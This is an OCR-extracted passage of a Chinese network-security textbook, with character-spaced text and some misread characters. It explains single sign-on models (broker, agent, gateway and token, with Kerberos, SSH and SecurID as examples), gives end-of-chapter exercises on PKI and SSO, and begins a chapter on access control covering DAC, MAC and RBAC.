危险 。 当 用 户 为 了 防止 遗忘 而 将 用 户 名 、` 口 令 等 记录 下 来 时 ,就 更 增加 了 系统 的 安 
全 隐患 。 


3.4.1 单 点 登录 基本 原理 


单 点 登录 的 实质 就 是 安全 上 下 文 (security context) 或 凭证 (credential) 在 多 个 应 用 系统 
之 间 的 传递 或 共享 。 假 设 有 3 个 应 用 系统 A、B 和 C, 使 用 单 点 登录 后 ,用 户 经 过 一 次 身份 
验证 就 可 以 访问 这 3 个 授权 的 应 用 系统 ,登录 流程 如 图 3. 22 所 示 。 

(1) 当 用 户 第 一 次 访问 应 用 系统 (例如 应 用 系统 A) 时 ,由 于 尚未 登录 ,会 被 引导 到 认证 
系统 进行 登录 认证 。 

(2) 根据 用 户 提供 的 登录 信息 ,认证 系统 进行 身份 校 验 , 如 果 通 过 校 验 , 则 生成 并 返还 
给 用 户 一 个 统一 的 认证 凭据 一 一 票据 ; 然后 从 认证 系统 跳 转 到 A 系统 ,用 户 成 功 访问 A 
系统 。 

(3) 用 户 再 访问 别 的 应 用 系统 (例如 应 用 系统 B 或 C) 时 带 上 这 个 票据 ,作为 自己 的 身 
份 凭据 。 

(4) 应 用 系统 接收 到 请 求 后 ,把 票据 送 到 认证 系统 进行 验证 。 如 果 通 过 验证 ,用 户 不 用 
再 次 登录 就 可 以 访问 应 用 系统 B 或 C 了 。 

票据 在 整个 系统 中 是 唯一 的 , 绑 定 了 时 间 惟 和 一 些 用 户 属性 ,用 户 无 法 通过 伪造 或 交换 
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3.22 单 点 登录 下 用 户 登 录 流程 


票据 来 非法 侵入 系统 。 系 统 可 以 通过 属性 实现 对 用 户 访 问 的 个 性 化 控制 。 
从 图 3. 22 的 流程 可 以 看 出 ,要 实现 单 点 登录 ,需要 以 下 主要 功能 : 
。 统一 认证 系统 。 所 有 应 用 系统 共享 一 个 身份 认证 系统 是 单 点 登录 的 前 提 之 一 。 
。 识别 票据 。 所 有 应 用 系统 能 够 识别 和 提取 票据 信息 ,认证 系统 应 该 对 票据 进行 校 
验 ,判断 其 有 效 性 。 
。 识别 登录 用 户 。 应 用 系统 能 够 能 自动 判断 当前 用 户 是 否 登 录 过 ,从 而 实现 单 点 登录 
的 功能 。 
上 面 的 功能 只 是 一 个 非常 简单 的 单 点 登录 架构 ,在 实际 应 用 中 有 着 更 加 复杂 的 结构 。 
有 两 点 需要 指出 : 
。 单一 的 用 户 信 息 数 据 库 并 不 是 必需 的 。 有 许多 系统 不 能 将 所 有 的 用 户 信息 都 集中 
存储 ,应 该 允许 用 户 信 息 放置 在 不 同 的 存储 中 。 只 要 认证 系统 统一 ,票据 的 产生 和 
校 验 统一 ,无 论 用户 信 息 存 储 在 什么 地 方 ,都 能 实现 单 点 登录 。 
。 统一 的 认证 系统 并 不 是 说 只 有 单个 认证 服务 器 。 整 个 系统 可 以 存在 多 个 认证 服务 
器 ,这 些 服务 器 甚至 可 以 是 不 同 的 产品 。 认 证 服务 器 之 间 通 过 标准 的 通信 协议 , 例 
如 SAML(Security Assertion Markup Language) , 互 换 认 证 信息 ,从 而 实现 更 高 级 
别 的 单 点 登录 。 


3.4.2 单 点 登录 系统 实现 模型 


实现 单 点 登录 的 技术 和 模型 主要 有 以 下 几 种 。 

1. 基于 经 纪 人 (Broker-based) 的 SSO 模型 

在 此 模型 中 ,有 一 个 专门 的 服务 器 集中 进行 身份 认证 和 用 户 账户 管理 , 它 负责 给 提出 请 
求 的 用 户 发 放 身 份 标识 ,是 一 个 公共 和 独立 的 “第 三 方 ”, 可 以 形象 地 称 其 为 “经 纪 人 ”。 

如 图 3. 23 所 示 ,该 模型 主要 由 3 部 分 组 成 : 支持 认证 服务 的 客户 端 \ 认 证 服务 器 和 支 
持 认 证 服务 的 应 用 系统 。 其 工作 流程 如 下 : 

(1) 客户 端 在 访问 系统 资源 之 前 ,首先 与 认证 服务 器 进行 身份 验证 ,获取 电子 身份 标 
识 ,为 提高 系统 的 安全 性 可 以 采用 双向 认证 方式 。 

(2) 客户 端 凭 借 该 身份 标识 访问 各 应 用 系统 ,实现 单 点 登录 。 如 果 电 子 身份 标识 非法 
或 者 过 期 ,应 用 系统 应 拒绝 用 户 的 访问 。 

基于 本 章 前 面 介绍 的 Kerberos 协议 实现 单 点 登录 是 此 模型 的 典型 应 用 。 其 他 的 还 有 
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图 3.23 基于 经 纪 人 的 SSO 模型 


Sesame 和 Kryptoknight, Sesame(Secure European System for Application in Multivendor 
Environment) 被 认为 是 欧洲 版 本 的 Kerberos, 而 KryptoKnight 是 IBM 公司 的 一 种 类 似 于 
Kerberos 的 鉴别 和 密 钥 分 配 系统 。 
这 种 模型 的 特点 如 下 : 
。 从 可 实施 性 角度 来 看 ,该 模型 需要 对 现 有 应 用 系统 进行 改造 ,使 其 适应 单 点 登录 的 
认证 机 制 ,而 改造 旧 系 统 的 工作 量 通常 较 大 ,实施 起 来 比较 困难 。 
。 从 可 管理 性 角度 来 看 ,该 模型 对 用 户 身 份 `. 权 限 、 密 钥 等 相关 认证 信息 进行 集中 存 
储 , 易 于 进行 管理 和 信息 维护 。 但 是 ,如 果 认 证 服务 器 失效 , 则 所 有 的 应 用 系统 和 用 
户 都 会 受到 影响 ,通常 采用 主 / 备 认证 服务 器 来 提高 系统 的 可 靠 性 。 
。 从 安全 性 角度 来 看 ,实际 的 安全 水 平 取决 于 所 采用 的 认证 协议 的 安全 特性 和 系统 工 
作 机 制 。 例 如 ,Kerberos 中 的 认证 仅 基 于 口令 ,这 就 使 系统 容易 受到 口令 猜测 的 
攻击 。 
。 从 可 使 用 性 角度 来 看 ,通过 身份 验证 的 客户 端 将 持 认 证 服务 器 返回 的 身份 标识 去 访 
问 应 用 系统 ,而 不 再 与 认证 服务 器 打交道 ,减轻 了 认证 服务 器 的 工作 负担 ,便于 系统 
的 扩展 ,也 适用 于 大 规模 用 户 的 环境 。 巾 于 所 有 用 户 的 登录 信息 都 被 系统 接管 ,所 
以 用 户 每 次 登录 都 要 提供 已 经 注册 的 账号 和 口令 ,匿名 用 户 无 法 登录 。 
2. 基于 代理 (agent-based) 的 SSO 模型 
这 是 一 种 软件 实现 方式 ,如 图 3. 24 所 示 。 在 此 模型 中 ,被 称 为 “代理 ”的 程序 可 以 运行 
在 客户 端 或 者 服务 器 上 ,是 客户 端 与 应 用 系统 之 间 的 通信 中 介 。 若 代理 部 署 在 客户 端 , 它 能 
装载 获得 账号 /口令 列表 ,自动 蔡 用 户 完 成 登录 过 程 ; 若 代 理 部 署 在 应 用 系统 服务 器 端 , 它 
就 是 服务 器 的 认证 系统 和 客户 端 认证 方法 之 间 的 “翻译 ”。 它 可 以 使 用 口令 表 或 加 密 密 钥 自 
动 完 成 用 户 认 证 ,从 而 免除 用 户 进行 认证 的 负担 。 
一 个 典型 的 基于 代理 模型 的 单 点 登录 解决 方案 是 SSH。SSH 是 目前 较 可 靠 、 专 为 远程 
登录 会 话 和 其 他 网 络 服务 提供 安全 性 的 协议 ,由 客户 端 和 服务 器 端的 软件 组 成 。 
服务 器 端 是 一 个 守护 进程 (daemon) ,在 后 台 运 行 并 响应 来 自 客户 端的 连接 请 求 ,一 般 
包括 公共 密 钥 认证 、 密 钥 交 换 、 对 称 密 钥 加 密 和 非 安 全 连接 。 
客户 端 包含 ssh 程序 以 及 像 scp( 远 程 复制 ) .slogin( 远 程 登录 ) 、sftp( 安 全 文件 传输 ) 等 
其 他 应 用 程序 。SSH 的 用 户 可 以 使 用 包括 RSA 算法 等 不 同 的 认证 方法 。 当 使 用 RSA 认 
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3.24 基于 代理 的 SSO 模型 


证 时 ,代理 程序 可 以 被 用 于 单 点 登录 。 如 果 终 端的 代理 程序 有 新 的 子 连接 产生 , 则 继承 原 有 
连接 的 认证 。 利 用 SSH 协议 可 以 把 所 有 传输 的 数据 进行 加 密 , 有 效 防止 远程 管理 过 程 中 的 
信息 泄露 ,从 而 避免 DNS 和 IP 欺骗 等 攻击 。 另 外 ,使 用 SSH 传输 的 数据 是 经 过 压缩 的 ,可 
以 加 快 数据 传输 的 速度 。 
这 种 模型 的 特点 如 下 : 
。 从 可 实施 性 角度 而 言 ,该 模型 移植 相对 容易 和 灵活 ,但 代理 程序 需要 实现 与 原 有 应 
用 系统 的 交互 , 即 每 个 运行 在 主机 (客户 端 或 服务 器 ) 上 的 代理 程序 都 要 兼容 现 有 的 
系统 ,增加 了 开发 量 , 不 具有 良好 的 通用 性 。 另 外 , 它 不 适合 跨 域 单 点 登录 的 实施 。 
。 从 可 管理 性 角度 而 言 ,每 个 应 用 系统 都 有 各 自 的 认证 模块 ,用 户 身份 信息 是 分 散 管 
理 的 ,增加 了 管理 难度 ,而 且 对 各 个 代理 的 身份 信息 和 权限 也 需要 进行 管理 和 设置 。 
。 从 安全 性 角度 而 言 ,该 模型 要 求 用 户 的 登录 凭证 在 本 地 存储 ,增加 了 口令 泄露 的 危 
险 。 采 用 有 加 密 技术 的 认证 协议 可 以 保证 代理 程序 的 通信 安全 ,但 要 保证 代理 软件 
本 身 的 安全 性 。 
。 从 可 使 用 性 角度 而 言 ,该 模型 只 要 配置 好 代理 软件 ,用 户 对 应 用 系统 的 访问 是 透明 
的 ,使 用 方便 。 
3. 基于 网 关 (gateway-based) 的 SSO 模型 
在 此 模型 中 ,所 有 的 客户 端 都 与 网 关 相 连 , 网 关 再 与 各 种 应 用 服务 器 进行 连接 ,所 有 的 
服务 资源 都 放 在 被 网 关 隔 离 的 受信 网 段 里 。 用 户 通过 网 关 进 行 认证 后 获得 访问 服务 的 
授权 。 
如 图 3. 25 所 示 ,网 关 是 通 往 所 有 服务 资源 必须 经 过 的 一 道 “ 门 ”, 它 可 以 是 防火 墙 , 也 可 
以 是 专门 用 于 通信 加 /解密 的 服务 器 。 
基于 网 关 的 单 点 登录 系统 模型 工作 方式 如 下 : 
。 客户 端 与 网 关 进 行 双向 身份 验证 , 即 客户 端 要 向 网 关 证 明 自 己 是 合法 用 户 , 同 时 网 
关 也 要 向 客户 端 证 明 自 己 是 值得 信赖 的 网 关 。 
。 客户 端 提出 自己 访问 资源 的 请 求 ,网 关 对 用 户 进行 认证 ,如 果 用 户 通 过 认证 ,网 关 则 
会 授权 用 户 使 用 对 应 的 服务 。 由 于 在 网 关 后 的 所 有 服务 资源 处 在 一 个 可 被 信赖 的 
网 络 中 ,如 果 在 网 关 后 的 服务 能 够 通过 IP 地 址 进行 识别 ,并 在 网 关上 建立 一 个 基于 
IP 的 规则 ,而 这 个 规则 如 果 与 在 网 关上 的 用 户 数据 库 相 结合 ,网 关 就 可 以 被 用 于 单 
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3.25 基于 网 关 的 SSO 模型 


点 登录 。 

基于 网 关 模型 与 基于 经 纪 人 模型 看 起 来 类 似 , 但 两 者 的 概念 是 有 区 别 的 。 与 经 纪 人 模 
型 不 同 的 是 ,在 用 户 登录 时 ,网 关 可 以 记录 客户 端的 身份 ,而 不 需要 元 余 的 验证 。 因 为 网 关 
控制 着 所 有 进入 应 用 服务 器 的 通道 ,可 以 监视 和 改变 数据 流 ,因此 当 用 户 想 要 进入 时 , 它 可 
以 置换 进入 后 的 认证 信息 ,把 它 传送 到 服务 器 ,这 样 既 能 进行 合适 的 访问 控制 ,应 用 服务 器 
自身 又 不 需要 改变 。 

这 种 模型 的 特点 如 下 : 

。 从 可 实施 性 角度 而 言 .该 模型 对 应 用 系统 基本 不 做 任何 改变 ,客户 端 也 不 需要 作 太 

大 变动 ,只 要 配置 它们 与 网 关 相互 认证 的 模块 即 可 ,实施 也 较为 简单 快速 。 但 是 ， 
在 实施 中 对 已 有 的 网 络 环境 要 求 比较 严格 ,所 以 其 应 用 范围 并 不 广泛 。 

。 从 可 管理 性 角度 而 言 ,该 模型 中 所 有 客户 机 通过 网 关 来 访问 资源 ,可 以 对 用 户 信息 
进行 集中 管理 ,减轻 了 网 络 管理 负担 。 如 果 使 用 多 个 网 关 以 克服 瓶颈 效应 ,那么 这 
些 网 关中 的 用 户 数据 要 实现 自动 同步 。 

。 从 安全 性 角度 而 言 ,该 模型 中 网 关 的 安全 性 至 关 重 要 ,可 以 采取 独立 的 防火 墙 来 保 
护 网 关 。 

。 从 可 使 用 性 角度 而 言 ,该 模型 的 网 关 作 为 一 个 中 心 组 件 , 它 的 性 能 会 影响 整个 系统 
的 效率 ,而且 不 适用 于 跨 域 的 单 点 登录 系统 。 

4. 基于 令 牌 (token-based) 的 SSO 模型 

此 模型 典型 的 应 用 是 由 RSA 公司 提出 的 一 个 称 为 SecurID 的 解决 方案 。SecurID 采用 
双 因 子 认证 。 第 一 个 因子 是 用 户 身份 识别 码 (PIN) ,这 是 一 串 保 密 的 数字 ,可 由 系统 管理 员 
定制 。 第 二 个 因子 是 SecurID Token, 这 是 一 个 小 型 数字 发 生 器 , 它 每 隔 一 段 时 间 产 生 新 的 
数字 。 这 个 发 生 器 的 时 钟 与 网 络 环境 中 提供 身份 鉴别 的 服务 器 (ACE) 保 持 同 步 ,并 且 与 
ACE 的 用 户 数据 库 保 持 映 射 .“PIN 十 同步 时 钟 数字 ”就 是 用 户 的 登录 代码 。 

在 基于 令 牌 的 SSO 方案 中 也 有 一 个 称 为 WebID 的 模块 。 在 Web 服务 器 上 安装 一 个 
ACE 服务 器 的 代理 程序 ,用 来 接收 SecurID。 当 访问 第 一 个 需要 认证 的 URL 时 ,WebID 会 
使 软件 产生 并 加 密 一 个 标识 ,这 个 标识 将 在 访问 其 他 资源 时 被 用 到 ,从 而 实现 单 点 登录 
功能 。 

这 种 模型 的 特点 如 下 : 
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。 从 可 实施 性 角度 而 言 ,该 模型 需要 增加 新 的 组 件 ,实施 范围 较 狭 窗 。 
。 从 可 管理 性 角度 而 言 ,由 于 该 模型 需要 在 系统 上 增加 一 些 新 的 组 件 ,因此 增加 了 管 
理 员 的 管理 负担 。 
。 从 安全 性 角度 而 言 , 基 于 令 牌 模型 的 最 大 特点 就 是 它 为 用 户 产生 基于 时 间 间 隔 的 一 
次 性 口令 ,增强 了 系统 的 安全 性 。 
。 从 可 使 用 性 角度 而 言 ,该 模型 需要 额外 的 硬件 和 软件 ,用 户 掌握 起 来 可 能 有 困难 。 
从 以 上 对 4 种 主要 的 单 点 登录 模型 的 介绍 和 评估 可 以 看 出 ,这些 实现 方案 各 有 优 缺 点 ， 
所 以 在 具体 实施 时 要 结合 应 用 环境 和 各 项 安全 技术 进行 综合 考虑 和 设计 。 例 如 ,将 基于 经 
理 人 模型 和 基于 代理 模型 进行 综合 ,如 图 3. 26 所 示 。 











获取 电子 身份 标识 


身份 认证 服务 器 








一 | 代理 程序 | 
客户 站 应 用 系统 A 
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一 代理 程 序 
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图 3.26 基于 代理 和 经 纪 人 的 SSO 模型 


此 方案 比较 适合 大 多 数 的 应 用 环境 , 它 一 方面 可 以 利用 基于 经 纪 人 模型 的 集中 管理 机 
制 , 对 用 户 进行 统一 的 身份 认证 管理 , 另 一 方面 又 可 以 利用 基于 代理 模型 的 灵活 性 ,减少 对 
原 有 应 用 系统 的 改造 。 


3.5 本 章 小 结 


本 章 首先 通过 几 个 典型 案例 引入 了 网 络 身份 认证 的 概念 和 作用 ,接着 列举 了 3 种 常用 
网 络 身份 认证 技术 , 即 口令 认证 IC 卡 认 证 和 基于 生物 特征 识别 的 认证 。 结 合 密码 技术 介 
绍 了 对 称 密码 认证 和 非 对 称 密码 认证 ,分 析 了 Kerberos 协议 和 RADIUS 协议 的 工作 过 程 
和 原理 ,描述 了 当前 在 电子 商务 和 电子 政务 等 领域 得 到 广泛 应 用 的 PKI 体系 。 最 后 ,介绍 
了 单 点 登录 系统 , 它 能 简化 服务 之 间 的 安全 认证 ,提高 服务 之 间 的 合作 效率 ,已 经 成 为 系统 
设计 的 基本 功能 之 一 。 
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3.6 本 章 习 题 


。 能够 用 于 身份 认证 的 人 体 生物 特征 有 哪些 ? 请 举例 说 明 。 
.PKI 的 核心 服务 有 哪些 ? 
. PKI 的 认证 服务 有 哪些 优点 ? 
. PKI 有 哪些 组 成 部 分 ,它们 之 间 存 在 哪些 关系 ? 
.PKI 系 统 是 如 何 实现 认证 、 保 密 、 不 可 否认 性 的 ? 
. 在 PKI 中 如 何 获取 对 方 的 证 书 和 相关 信息 ? 
.PKI 中 实现 证 书 存 取 库 的 方法 有 哪些 ? 
. 采用 支持 LDAP 的 目录 服务 器 构造 一 个 证 书 存 取 库 。 
.SSO 的 作用 是 什么 ?SSO 有 哪些 模型 ? 
10. 在 证 书 注册 服务 器 上 注册 一 个 个 人 证 书包 括 哪些 步骤 ? 试 在 安全 网 站 上 申请 免费 
的 个 人 证 书 。 
11. 简 述 邮件 加 密 软件 PGP 的 加 密 体 制 和 密 钥 管理 策略 ,并 用 PGP 实现 对 文件 和 邮 
件 的 加 密 传输 。 


R= ~ 中 上 上书 王 
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访问 控制 技术 起 源 于 20 世纪 70 年 代 , 在 40 多 年 的 发 展 过 程 中 ,先后 出 现 了 多 种 重要 
的 访问 控制 技术 ,它们 的 基本 目标 都 是 防止 非法 用 户 进 入 系统 和 合法 用 户 对 系统 资源 的 非 
法 使 用 。 本 童 首先 介绍 访问 控制 基础 ,包括 自主 访问 控制 ,强制 访问 控制 .基于 角色 的 访问 
控制 以 及 使 用 控制 模型 ,然后 在 此 基础 上 重点 介绍 网 络 访问 控制 的 实现 一 一 防火 墙 技 术 。 

本 章 主 要 内 容 : 

* 访问 控制 基础 

。 集中 式 防火 墙 技 术 

。 分布 式 防火 墙 技术 

。 嵌入 式 防火 墙 技术 


4.1 访问 控制 基础 


访问 控制 一 直 是 信息 安全 的 重要 保证 之 一 ,主要 经 历 了 4 个 阶段 : 自主 访问 控制 ,强制 
访问 控制 .基于 角色 的 访问 控制 和 使 用 控制 。 本 节 先 以 一 个 访问 控制 实例 引入 访问 控制 的 
需求 ,并 针对 以 上 4 个 阶段 分 别 阐述 相关 的 内 容 。 


4.1.1 访问 控制 实例 


访问 控制 在 各 种 信息 系统 中 都 极为 常见 ,这 对 于 信息 的 保护 非常 重要 。 接 下 来 举 几 个 
常见 的 实例 。 

1. 防火 墙 

防火 墙 是 随处 可 见 的 网 络 安全 访问 控制 设施 ,对 进出 网 络 的 分 组 进行 控制 ,如 图 4.1 所 
示 。 内 部 网 络 及 资源 对 内 部 可 信和 网 络 完全 开放 ,对 于 外 部 可 信用 户 开放 可 供 外 部 访问 的 服 
务 与 资源 ,对 于 外 部 不 可 信用 户 则 完全 禁止 对 内 部 资源 的 访问 。 这 就 是 防火 墙 的 访问 控制 。 

2. 文件 密级 及 可 执行 权限 

个 人 计算 机 的 操作 系统 如 Windows 等 都 具有 一 个 访客 模式 ,只 要 在 计算 机 中 创建 一 个 
访客 用 户 ,并 对 用 户 和 文件 进行 权限 的 设置 ,那么 身 为 访客 的 用 户 便 不 能 访问 超越 其 权限 的 
文件 。 很 多 人 也 应 该 遇 到 过 这 样 的 一 些 问题 , 当 某 个 程序 不 能 运行 或 者 运行 出 错时 ,可 以 右 
击 该 程序 ,在 快捷 菜单 中 选择 以 管理 员 身份 运行 ,这 时 程序 就 能 正常 运行 了 ,这 是 因为 管 
理 员 具有 最 高 权限 .能够 提供 程序 所 需要 的 资源 。 这 个 操作 就 涉及 文件 的 密级 与 可 执行 
极限 。 

3. 信息 系统 的 访问 控制 

每 个 人 都 有 各 种 各 样 的 账户 /密码 等 (如 银行 卡 .QQ 等 ), 这 些 账 户 /密码 就 是 一 系列 的 
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图 4.1 基于 防火 墙 的 网 络 安全 访问 控制 


身份 认证 ,确定 这 个 账户 的 使 用 者 拥有 控制 这 个 账户 的 权限 ,只 有 通过 了 身份 认证 , 才 具 有 
进入 这 个 账户 服务 及 访问 信息 的 权限 。 例 如 ,只 有 使 用 学 号 /密码 才能 查 到 自己 的 课表 和 成 
绩 ,同时 辅导 员 和 本 专业 的 老师 也 可 以 看 到 学 生 的 成 绩 信息 。 

下 面 从 自主 访问 控制 ,强制 访问 控制 .基于 角色 的 访问 控制 和 使 用 控制 4 个 方面 进行 访 
问 控制 理论 的 曾 述 。 


4.1.2 自主 访问 控制 


自主 访问 控制 (Discretionary Access Control,DAC) 是 基于 对 主体 (用 户 、 进 程 ) 的 识别 
来 限制 对 客体 (文件 数据) 的 访问 ,而 且 是 自主 的 。 所 谓 自主 是 指 具 有 授予 某 种 访问 权限 的 
主体 能 够 将 访问 权限 或 其 子 集 授 予 其 他 主体 ,因此 ,DAC 又 称 为 基于 主体 的 访问 控制 。 

DAC 的 实现 方法 一 般 是 建立 系统 访问 控制 矩阵 ,矩阵 的 行 对 应 系统 的 主体 , 列 对 应 系 
统 的 客体 ,元 素 表示 主体 对 客体 的 访问 权限 。 自 主 访问 控制 中 ,用 户 可 以 针对 被 保护 对 象 制 
定 自己 的 保护 策略 。 

。 每 个 主体 拥有 一 个 用 户 名 并 属于 一 个 组 或 具有 一 个 角色 。 

。 每 个 客体 都 拥有 一 个 限定 主体 对 其 访问 权限 的 访问 控制 列表 (Access Control List， 

ACL)Y。 
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。 每 次 访问 发 生 时 都 会 基于 访问 控制 列表 检查 用 户 标 识 以 实现 对 其 访问 权限 的 控制 。 
基于 行 的 方法 是 在 每 个 主体 上 都 附加 一 个 该 主体 可 以 访问 的 客体 的 明细 表 。 根 据 表 中 
信息 的 不 同 , 表 有 3 种 形式 : 
。 权能 表 (capabilities list) 。 决 定 用 户 是 否 可 以 对 客体 进行 访问 以 及 进行 何 种 形式 的 
访问 ( 读 、 写 .删改 ,执行 等 )。 一 个 拥有 某 种 权限 的 主体 可 以 按 一 定 方式 访问 客体 ， 
并 且 在 进程 运行 期 间 访问 权限 可 以 添加 或 删除 。 
。 前 级 表 (porfiles)。 包 括 受 保护 的 客体 名 以 及 主体 对 它 的 访问 权 。 当 主体 欲 访问 某 
客体 时 ,自主 访问 控制 系统 将 检查 主体 的 前 级 是 否 具有 它 所 请 求 的 访问 权 。 
。 口令 (password) 机 制 。 每 个 客体 (甚至 客体 的 每 种 访问 模式 ) 都 需要 一 个 口令 ,主体 
访问 客体 时 首先 提供 该 客体 的 口令 。 
基于 列 的 自主 访问 控制 是 对 每 个 客体 附加 一 个 它 可 访问 主体 的 明细 表 , 有 两 种 形式 : 
保护 位 (protection bits) 和 访问 控制 列表 (ACL)。 保 护 位 是 对 所 有 的 主体 指明 一 个 访问 模 
式 集合 ,由 于 它 不 能 完备 地 表达 访问 控制 矩阵 ,因而 很 少 使 用 。 访 问 控制 列表 可 以 决定 任 一 
主体 是 否 能 够 访问 该 客体 ,是 在 该 客体 上 附加 一 张 主体 明细 表 的 方法 来 表示 访问 控制 矩阵 。 
表 中 的 每 一 项 包括 主体 的 身份 和 对 客体 的 访问 权 。 
尽管 DAC 已 在 许多 系统 (如 UNIX 等 ) 中 得 以 实现 ,但 是 DAC 的 一 个 致命 弱点 是 访问 
权 的 授予 是 可 以 传递 的 。 一 旦 访问 权 被 传递 出 去 将 难以 控制 ,访问 权 的 管理 是 相当 困难 的 ， 
会 带 来 严重 的 安全 问题 。 另 一 方面 ,DAC 不 保护 受 保护 的 客体 产生 的 副本 , 即 一 个 用 户 不 
能 访问 某 一 客体 ,但 能 够 访问 该 客体 的 副本 ,这 更 增加 了 管理 的 难度 。 在 大 型 系统 中 , 主 、 客 
体 的 数量 巨大 ,无 论 是 用 哪 一 种 形式 的 DAC, 所 带 来 的 系统 开销 都 是 相当 大 的 ,效率 相当 低 
下 ,难以 满足 大 型 应 用 特别 是 网 络 应 用 的 需要 。 
DAC 存在 的 缺点 归纳 起 来 有 以 下 几 点 : 
。 访问 控 制 资 源 比 较 分 散 。 
。 用 户 关 系 不 易 管理 。 
。 访问 授权 是 可 传递 的 。 
。 在 大 型 系统 中 , 主 、 客 体 的 数量 庞大 ,造成 系统 开销 巨大 。 
在 商业 环境 中 ,大 多 数 系统 基于 自主 访问 控制 机 制 来 实现 访问 控制 ,如 主流 操作 系统 
(Windows Server、UNIX 系统 )、 防火墙 CACL) 等 。 


4.1.3 强制 访问 控制 


在 强制 访问 控制 (Mandatory Access Control,MAC) 系 统 中 ,所 有 主体 和 客体 都 被 分 配 
了 安全 标签 ,安全 标签 标识 一 个 安全 等 级 ,通过 比较 主体 和 客体 的 安全 级 别 来 决定 是 否 人 允许 
主体 访问 客体 。 安 全 级 别 是 由 系统 自动 赋予 每 个 实体 或 由 安全 管理 员 分 配给 每 个 实体 , 它 
不 能 被 任意 更 改 。 安 全 级 别 一 般 有 4 级 : 绝密 级 (Top Secret)、 秘 密级 (Secret)、 机 密级 
(Confidential) 和 无 级 别 级 (Unclas sified)。MAC 最 早 被 应 用 在 军 方 系统 中 ,访问 者 拥有 包 
含 等 级 列表 的 许可 ,定义 了 可 以 访问 哪个 级 别 的 客体 ,其 访问 策略 是 由 授权 中 心 决定 的 强制 
性 规则 。MAC 的 两 个 关键 规则 是 : 不 向 上 读 ( 用 户 级 别 低 于 文件 级 别 的 读 操作 ) 和 不 向 下 
写 ( 用 户 级 别 高 于 文件 级 别 的 写 操作 ) , 即 信息 流 只 能 从 低 安全 级 向 高 安全 级 流动 ,任何 违反 
非 单 向 循环 信息 流 的 行为 都 被 禁止 。 
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MAC 常 与 DAC 结合 使 用 ,主体 只 有 通过 了 DAC 和 MAC 的 检查 后 ,才能 访问 某 个 客 
体 。 由 于 MAC 对 客体 施加 了 更 严格 的 访问 控制 ,因而 可 以 防止 特洛伊 木马 之 类 的 程序 偷 
窃 受 保护 的 信息 ,同时 MAC 对 于 用 户 意外 泄露 机 密 信息 的 可 能 性 也 有 预防 能 力 。 但 是 如 
果 用 户 恶意 泄 露 信息 , 则 可 能 无 能 为 力 。MAC 的 弱点 总 结 如 下 : 对 用 户 恶意 泄露 信息 无 
能 为 力 ; @ 基 于 MAC 的 应 用 领域 比较 窗 ; @ 完 整 性 方面 控制 不 够 ; @ 过 于 强调 保密 性 ,对 
系统 的 授权 管理 不 便 , 不 够 灵活 。 


4.1.4 基于 角色 的 访问 控制 


随 着 网 络 的 发 展 和 Internet 的 广泛 应 用 ,信息 的 完整 性 需求 超过 了 机 密 性 ,传统 的 
DAC/MAC 策略 已 无 法 满足 信息 完整 性 的 要 求 ,于 是 人 们 提出 了 基于 角色 的 访问 控制 。 这 
种 机 制 在 用 户 和 访问 许可 权 之 间 引 入 角色 (role) 的 概念 ,用 户 与 特定 的 一 个 或 多 个 角色 相 
联系 ,角色 与 一 个 或 多 个 访问 许可 权 相 联系 ,如 图 4. 2 所 示 。 
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图 4.2 基于 角色 的 访问 控制 模型 


2001 年 8 月 ,美国 国家 标准 与 技术 研究 院 (NIST) 发 表 了 基于 角色 的 访问 控制 (Role- 
based Access Control,RBAC) 建 议 标 准 , 描 述 了 RBAC 系统 最 基本 的 特征 , 旨 在 提供 一 个 
权威 的 .可 用 的 RBAC 参考 规范 。 该 标准 包括 两 个 部 分 : RBAC 参考 模型 和 RBAC 功能 规 
范 。RBAC 参考 模型 给 出 了 RBAC 集合 和 关系 的 严格 定义 ,包括 4 个 部 分 : 核心 RBAC 
(core RBAC) .层次 RBAC(hierarchical RBAC) ,静态 职责 分 离 (Static Separation of Duties， 
SSD) 和 动态 职责 分 离 (Dynamic Separation of Duties, DSD)。RBAC 功能 规范 为 每 个 组 件 
定义 了 关于 创建 和 维护 RBAC 集合 和 关系 的 管理 功能 、 系 统 支 持 功能 和 审查 功能 。 

RBAC 的 基本 概念 包含 : 把 角色 集 分 配给 用 户 集 ; 把 许可 集 分 配给 角色 集 ; 用 户 集 作 
为 角色 集 的 成 员 获 得 许可 集 。 一 个 用 户 可 以 分 配给 不 同 的 角色 ,一 个 角色 可 以 拥有 多 个 用 
户 ; 一 个 许可 权 可 以 拥有 不 同 的 角色 ,一 个 角色 可 以 拥有 不 同 的 许可 权 。 核 心 RBAC 定义 
了 实现 RBAC 系统 所 需 元 素 、 元 素 集 以 及 关系 的 最 小 集 。 

如 图 4. 3 所 示 ,核心 RBAC 的 基本 元 素 集合 有 5 类 : 用 户 集 (users)、 角 色 集 (roles) 、 客 
体 集 (objects) .操作 集 (operations) 和 许可 集 (permissions) 。 基 本 关系 包含 用 户 指派 (User 
Assignment,UA) 和 许可 指派 (Permission Assignment,PA) 。 

为 了 描述 用 户 到 该 用 户 激活 的 角色 子 集 之 间 的 映射 关系 ,核心 RBAC 采用 会 话 集 
(sessions) 来 描述 这 种 映射 关系 。 在 用 户 创建 一 个 会 话 期 间 , 该 用 户 可 以 激活 已 经 分 配给 他 
的 角色 和 集 的 子 集 。 一 个 会 话 对 应 一 个 用 户 ,但 是 一 个 用 户 可 以 对 应 多 个 会 话 。 函 数 
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user_sessions 


图 4.3 核心 RBAC 模型 


session_roles 提供 了 在 一 个 会 话 中 的 角色 集 , 函 数 user_sessions 提供 了 一 个 用 户 拥有 的 会 
话 集 。 
RBAC 的 管理 功能 包含 以 下 3 方面 : 
。 创建 和 维护 用 户 集 和 角色 集 , 以 及 建立 角色 集 到 客体 集 和 操作 集 之 间 的 关系 (客体 
集 和 操作 集 通 常 是 由 模型 应 用 的 底层 系统 预先 定义 的 ) 。 
。 创建 和 维护 UA 和 了 PA。 指 派 /撤销 用 户 角色 关系 ,指派 /撤销 许可 角色 关系 。 
。 审查 功能 。 当 用 户 指 派 和 许可 指派 关系 实体 建立 以 后 ,管理 员 应 该 具有 从 用 户 和 角 
色 的 视角 审查 这 些 关 系 内容 的 能 力 。 以 UA 关系 为 例 , 管 理 员 应 该 非常 便捷 地 查询 
一 个 给 定 角色 的 所 有 用 户 以 及 一 个 给 定 用 户 的 所 有 角色 。 
系统 功能 包含 会 话 管理 和 访问 控制 决策 。 当 一 个 用 户 创 建 会 话 时 ,需要 建立 一 个 默认 
的 激活 角色 集 作为 会 话 的 开始 ; 在 会 话 期 间 ,该 激活 角色 集 能 够 通过 添加 、 删 除 激活 角色 来 
